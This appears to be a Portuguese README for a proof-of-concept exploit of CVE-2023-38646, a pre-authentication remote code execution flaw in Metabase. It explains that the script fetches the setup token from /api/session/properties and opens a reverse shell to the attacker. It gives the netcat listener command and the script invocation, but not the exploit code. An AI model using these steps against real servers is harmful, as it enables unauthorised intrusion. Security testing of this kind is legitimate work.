
PoC de RCE pré-autenticação no Metabase
Metabase open source antes da versão 0.46.6.1 e Metabase Enterprise antes da versão 1.46.6.1 permitem que atacantes executem comandos arbitrários no servidor. Eu escrevi o script diretamente para obter um reverse shell na máquina do atacante.
O script requer a URL de destino, o IP do atacante e a porta. Fornecer o token de configuração não é necessário para este exploit, pois o script tenta obtê-lo de /api/session/properties.
Certifique-se de iniciar o listener netcat na máquina do atacante usando o seguinte comando:
nc -nlvp {Port}
Execute o script POC com:
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
